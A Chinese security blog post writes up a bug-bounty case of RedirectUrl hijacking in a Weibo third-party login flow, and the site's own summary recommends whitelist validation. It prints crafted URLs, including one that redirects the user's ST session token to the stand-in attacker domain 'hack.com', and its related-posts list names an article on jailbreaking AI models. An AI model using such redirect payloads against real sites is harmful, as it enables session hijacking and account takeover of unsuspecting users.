文章总结： 本文记录了一次RedirectUrl重定向劫持的SRC实战案例。作者发现在第三方鉴权登录过程中，重定向参数未经过严格校验，攻击者可修改该参数将用户ST凭证重定向至恶意域名从而劫持会话。文章指出该漏洞常见且危害较高，建议开发者对重定向地址实施白名单校验以防凭证外泄，文末还提及了相关安全知识库推广内容。 综合评分： 74 文章分类： 渗透测试,SRC活动,WEB安全,实战经验

【SRC实战】RedirectUrl劫持实战

原创

渗透测试安全日记 渗透测试安全日记

渗透测试安全日记

2026年3月4日 07:00 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息、工具等资源而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任!

01 背景

RedirectUrl劫持是各大SRC必测的一个功能点，也比较常见一种漏洞，因此特分享一期通过RedirectUrl劫持用户凭证的案例，详细实战过程见实战环节！

号外号外，免费的睿鉴安全知识库上线了。点击下发链接，福利直达！！

安全知识模块，只要放一些实战的案例，目前已更新五期内容，上新奇安信攻防社区专栏后续会持续更新。主要内容如下。

资源中心模块，主要会放一些安全工具，给各位师傅提供一站式下载的渠道，目前已上线20+款工具，主要工具如下。

02 实战过程

开局一个登录页，可以看到登录首页有一些通过第三方鉴权的功能，Mark一下，后续遇到这种类似微信、微博等第三方鉴权的功能，各位师傅可以关注下。

首先用户先访问这个页面。

这种情况下可以点击下第三方的鉴权的图标，复制出跳转的url情况。正常的url是如下，通过鉴权后第三方平台会把ST重定向给业务站点如下图的test域。

https://passport.weibo.com/Union/WeiBo?RedirectUrl=http://xxx.业务.com?ST=XXX

此时将上述的通过扫描验证后，下一步的RedirectUrl后的参数改为www.baidu.com。此时此站点会将用户的ST凭证传到百度的域名下，此时打开的是百度的页面。

https://passport.weibo.com/Union/WeiBo?RedirectUrl=www.baidu.com?ST=XXX

如下图已经成功跳转到了百度页面，还带了ST。

那么此时就存在用户ST外带的漏洞，如果把RedirectUrl参数后hack能接收到此ST的域名，那么就可以用此域名站点接收用户的ST。

https://passport.test.com/Union/WeiBo?RedirectUrl=http://hack.com

漏洞已验证完毕，接收完ST能干啥？欢迎各位师傅在评论区探讨。

往期好文

网络安全人员的金牌证书：为你铺就高薪职业之路

【SRC实战】简单FUZZ拿下高危漏洞

AI大模型“越狱”实战

【SRC实战】任意用户密码重置实战

【SRC实战】记一次越权测试实战

免密登录某后台管理系统实战

安服人应急“薅洞”指南

推荐一款资产筛选工具

【SRC实战】短信验证码爆破，拿下某众测中危

【SRC实战】一次“链式”渗透，从站点A打到站点B

用户账号接管实战，洞穿开发者逻辑

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：渗透测试安全日记 渗透测试安全日记 渗透测试安全日记《【SRC实战】RedirectUrl劫持实战》